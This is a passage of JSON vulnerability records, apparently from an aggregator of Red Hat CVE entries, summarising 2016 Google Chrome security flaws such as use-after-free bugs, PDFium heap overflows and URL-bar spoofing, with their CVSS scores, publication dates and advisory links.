55.0.2883.75 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-12-02T08:49:04", "type": "redhatcve", "title": "CVE-2016-9651", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9651"], "modified": "2020-08-18T08:41:59", "id": "RH:CVE-2016-9651", "href": "https://access.redhat.com/security/cve/cve-2016-9651", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-09-02T22:52:16", "description": "Incorrect handling of invalid URLs in Google Chrome prior to 55.0.2883.75 for Mac, Windows and Linux, and 55.0.2883.84 for Android allowed a remote attacker to spoof the contents of the Omnibox (URL bar) via a crafted HTML page.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 6.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 3.6}, "published": "2016-12-02T08:50:50", "type": "redhatcve", "title": "CVE-2016-5222", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5222"], "modified": "2020-08-18T08:42:22", "id": "RH:CVE-2016-5222", "href": "https://access.redhat.com/security/cve/cve-2016-5222", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-09-02T22:52:15", "description": "Blink in Google Chrome prior to 55.0.2883.75 for Mac, Windows and Linux, and 55.0.2883.84 for Android incorrectly handled iframes, which allowed a remote attacker to bypass a no-referrer policy via a crafted HTML page.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 4.3, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 1.4}, "published": "2016-12-02T08:48:55", "type": "redhatcve", "title": "CVE-2016-9650", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9650"], "modified": "2020-08-18T08:41:58", "id": "RH:CVE-2016-9650", "href": "https://access.redhat.com/security/cve/cve-2016-9650", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-09-02T22:52:13", "description": "A timing attack on denormalized floating point arithmetic in SVG filters in Blink in Google Chrome prior to 55.0.2883.75 for Mac, Windows and Linux, and 55.0.2883.84 for Android allowed a remote attacker to bypass the Same Origin Policy via a crafted HTML page.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 4.3, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 1.4}, "published": "2016-12-02T08:50:00", "type": "redhatcve", "title": "CVE-2016-5224", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5224"], "modified": "2020-08-18T08:39:54", "id": "RH:CVE-2016-5224", "href": "https://access.redhat.com/security/cve/cve-2016-5224", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-09-02T22:52:14", "description": "Heap buffer overflow during TIFF image parsing in PDFium in Google Chrome prior to 55.0.2883.75 for Mac, Windows and Linux, and 55.0.2883.84 for Android allowed a remote attacker to potentially exploit heap corruption via a crafted PDF file.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-12-02T08:48:11", "type": "redhatcve", "title": "CVE-2016-5210", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5210"], "modified": "2020-08-18T08:39:25", "id": "RH:CVE-2016-5210", "href": "https://access.redhat.com/security/cve/cve-2016-5210", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-09-02T22:52:12", "description": "The extensions API in Google Chrome prior to 55.0.2883.75 for Mac, Windows and Linux, and 55.0.2883.84 for Android incorrectly handled navigation within PDFs, which allowed a remote attacker to temporarily spoof the contents of the Omnibox (URL bar) via a crafted HTML page containing PDF data.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 6.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 3.6}, "published": "2016-12-02T08:48:40", "type": "redhatcve", "title": "CVE-2016-5218", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5218"], "modified": "2020-08-18T08:39:44", "id": "RH:CVE-2016-5218", "href": "https://access.redhat.com/security/cve/cve-2016-5218", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-09-02T22:52:14", "description": "A use after free in PDFium in Google Chrome prior to 55.0.2883.75 for Mac, Windows and Linux, and 55.0.2883.84 for Android allowed a remote attacker to perform an out of bounds memory read via a crafted PDF file.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "LOW", "baseScore": 6.3, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 3.4}, "published": "2016-12-02T08:47:58", "type": "redhatcve", "title": "CVE-2016-5216", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5216"], "modified": "2020-08-18T08:39:41", "id": "RH:CVE-2016-5216", "href": "https://access.redhat.com/security/cve/cve-2016-5216", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-09-02T22:52:15", "description": "The extensions API in Google Chrome prior to 55.0.2883.75 for Mac, Windows and Linux, and 55.0.2883.84 for Android incorrectly permitted access to privileged plugins, which allowed a remote attacker to bypass site isolation via a crafted HTML page.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 6.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 3.6}, "published": "2016-12-02T08:48:04", "type": "redhatcve", "title": "CVE-2016-5217", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5217"], "modified": "2020-08-18T08:39:41", "id": "RH:CVE-2016-5217", "href": "https://access.redhat.com/security/cve/cve-2016-5217", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-09-02T22:52:14", "description": "A use after free in webaudio in Google Chrome prior to 55.0.2883.75 for Mac, Windows and Linux, and 55.0.2883.84 for Android allowed a remote attacker to perform an out of bounds memory read via a crafted HTML page.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "LOW", "baseScore": 6.3, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 3.4}, "published": "2016-12-02T08:47:51", "type": "redhatcve", "title": "CVE-2016-5215", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5215"], "modified": "2020-08-18T08:39:34", "id": "RH:CVE-2016-5215", "href": "https://access.redhat.com/security/cve/cve-2016-5215", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-09-02T22:52:11", "description": "Integer overflow in PDFium in Google Chrome prior to 55.0.2883.75 for Mac, Windows and Linux, and 55.0.2883.84 for Android allowed a remote attacker to potentially exploit heap corruption or DoS via a crafted PDF file.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 6.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 3.6}, "published": "2016-12-02T08:50:43", "type": "redhatcve", "title": "CVE-2016-5223", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5223"], "modified": "2020-08-18T08:39:54", "id": "RH:CVE-2016-5223", "href": "https://access.redhat.com/security/cve/cve-2016-5223", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-09-02T22:52:37", "description": "An off by one error resulting in an allocation of zero size in FFmpeg in Google Chrome prior to 54.0.2840.98 for Mac, and 54.0.2840.99 for Windows, and 54.0.2840.100 for Linux, and 55.0.2883.84 for Android allowed a remote attacker to potentially exploit heap corruption via a crafted video file.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-11-10T09:17:33", "type": "redhatcve", "title": "CVE-2016-5199", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5199"], "modified": "2020-08-18T08:47:31", "id": "RH:CVE-2016-5199", "href": "https://access.redhat.com/security/cve/cve-2016-5199", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-09-03T01:50:21", "description": "Google Chrome prior to 54.0.2840.59 for Windows, Mac, and Linux; 54.0.2840.85 for Android permitted navigation to blob URLs with non-canonical origins, which allowed a remote attacker to spoof the contents of the Omnibox (URL bar) via crafted HTML pages.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 6.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 3.6}, "published": "2016-10-13T08:17:22", "type": "redhatcve", "title": "CVE-2016-5189", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5189"], "modified": "2019-10-12T00:26:51", "id": "RH:CVE-2016-5189", "href": "https://access.redhat.com/security/cve/cve-2016-5189", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-09-02T22:52:11", "description": "A use after free in V8 in Google Chrome prior to 55.0.2883.75 for Mac, Windows and Linux, and 55.0.2883.84 for Android allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-12-02T08:48:33", "type": "redhatcve", "title": "CVE-2016-5213", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5213"], "modified": "2020-08-18T08:39:31", "id": "RH:CVE-2016-5213", "href": "https://access.redhat.com/security/cve/cve-2016-5213", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-09-02T22:52:15", "description": "Type confusion in libGLESv2 in ANGLE in Google Chrome prior to 55.0.2883.75 for Mac, Windows and Linux, and 55.0.2883.84 for Android possibly allowed a remote attacker to bypass buffer validation via a crafted HTML page.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "LOW", "baseScore": 6.3, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 3.4}, "published": "2016-12-02T08:50:27", "type": "redhatcve", "title": "CVE-2016-5221", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5221"], "modified": "2020-08-18T08:39:47", "id": "RH:CVE-2016-5221", "href": "https://access.redhat.com/security/cve/cve-2016-5221", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-09-02T22:52:15", "description": "Google Chrome prior to 55.0.2883.75 for Mac, Windows and Linux, and 55.0.2883.84 for Android insufficiently sanitized DevTools URLs, which allowed a remote attacker to read local files via a crafted HTML page.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 6.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 3.6}, "published": "2016-12-02T08:48:28", "type": "redhatcve", "title": "CVE-2016-5212", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5212"], "modified": "2020-08-18T08:39:28", "id": "RH:CVE-2016-5212", "href": "https://access.redhat.com/security/cve/cve-2016-5212", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-09-02T22:52:14", "description": "Google Chrome prior to 55.0.2883.75 for Windows mishandled downloaded files, which allowed a remote attacker to prevent the downloaded file from receiving the Mark of the Web via a crafted HTML page.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 4.3, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 1.4}, "published": "2016-12-02T08:47:44", "type": "redhatcve", "title": "CVE-2016-5214", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5214"], "modified": "2020-08-18T08:39:32", "id": "RH:CVE-2016-5214", "href": "https://access.redhat.com/security/cve/cve-2016-5214", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-09-02T22:53:01", "description": "Blink in Google Chrome prior to 54.0.2840.59 for Windows, Mac, and Linux; 54.0.2840.85 for Android had insufficient validation in bitmap handling, which allowed a remote attacker to potentially exploit heap corruption via crafted HTML pages.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-10-13T08:17:33", "type": "redhatcve", "title": "CVE-2016-5182", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5182"], "modified": "2019-10-12T00:26:39", "id": "RH:CVE-2016-5182", "href": "https://access.redhat.com/security/cve/cve-2016-5182", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-09-02T22:52:37", "description": "A leak of privateClass in the extensions API in Google Chrome prior to 54.0.2840.100 for Linux, and 54.0.2840.99 for Windows, and 54.0.2840.98 for Mac allowed a remote attacker to access privileged JavaScript code via a crafted HTML page.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 6.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 3.6}, "published": "2016-11-10T09:17:42", "type": "redhatcve", "title": "CVE-2016-5201", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5201"], "modified": "2020-08-18T08:45:58", "id": "RH:CVE-2016-5201", "href": "https://access.redhat.com/security/cve/cve-2016-5201", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-09-02T22:52:12", "description": "Leaking of an SVG shadow tree leading to corruption of the DOM tree in Blink in Google Chrome prior to 55.0.2883.75 for Mac, Windows and Linux, and 55.0.2883.84 for Android allowed a remote attacker to inject arbitrary scripts or HTML (UXSS) via a crafted HTML page.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 2.7}, "published": "2016-12-02T08:49:30", "type": "redhatcve", "title": "CVE-2016-5204", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", 